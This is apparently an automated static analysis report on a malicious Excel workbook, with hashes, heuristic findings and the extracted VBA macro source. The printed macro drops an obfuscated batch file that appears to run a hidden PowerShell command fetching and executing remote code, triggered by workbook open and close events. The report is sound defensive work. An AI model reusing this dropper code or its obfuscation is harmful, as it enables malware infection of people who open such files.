Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5a8fda8c26a1976d…

MALICIOUS

Office (OOXML)

22.4 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-22
MD5: 873daff18f021524f07eea52ff6c8ca8 SHA-1: 18596c67536056f3d70ca2bc9409a16c020dfac2 SHA-256: 5a8fda8c26a1976d8cb944ffe7680838e28ce39472b0f9481041cdd4b3573472
208 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1829 bytes
SHA-256: 2f9291e5969e42f3eebecca091d42e641617a3bbace4349e3366e932befaa3dd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EstaPastaDeTrabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()

 
   Dim sFile As String
   
   sFile = Environ("Public") & "\Docs.bat"
      
   Close
   

   Open sFile For Output As #1
   Print #1, "@echo off"
   Print #1, "Set abf=uOqd50k1ta8mgNG9xSDHTy2v7ErLsYFXMjKbnlf34iwCPeIzQUZJ6VhBAcpRoW"
   Print #1, "cls"
   Print #1, "%abf:~57,1%%abf:~11,1%%abf:~3,1% /%abf:~57,1% %abf:~28,1%%abf:~8,1%%abf:~9,1%%abf:~26,1%%abf:~8,1% /%abf:~11,1%%abf:~41,1%%abf:~36,1% %abf:~44,1%%abf:~60,1%%abf:~42,1%%abf:~45,1%%abf:~26,1%%abf:~17,1%%abf:~54,1%%abf:~45,1%%abf:~37,1%%abf:~37,1% -%abf:~45,1%%abf:~16,1% %abf:~55,1%%abf:~21,1%%abf:~58,1%%abf:~9,1%%abf:~28,1%%abf:~28,1% -%abf:~36,1%%abf:~1,1%%abf:~58,1% -%abf:~42,1% %abf:~7,1% %abf:~41,1%'%abf:~45,1%'%abf:~16,1%(%abf:~41,1%%abf:~42,1%%abf:~26,1%('%abf:~54,1%%abf:~8,1%%abf:~8,1%%abf:~58,1%://%abf:~38,1%%abf:~9,1%%abf:~57,1%%abf:~45,1%%abf:~16,1%%abf:~8,1%%abf:~26,1%%abf:~9,1%%abf:~3,1%%abf:~45,1%.%abf:~57,1%%abf:~60,1%%abf:~11,1%.%abf:~35,1%%abf:~26,1%/%abf:~47,1%.%abf:~11,1%%abf:~58,1%%abf:~39,1%'))"

  
      
   'sFile
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)
   
   Shell$ _
"cmd /c ping -n 15 127.0.0.1 & %public%\Docs.bat exit" & vbLf, 0
End Sub



Attribute VB_Name = "Planilha1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 15360 bytes
SHA-256: b90560ab147a6ec32db7121e37758f28b527cf00134777067377b165bfce8088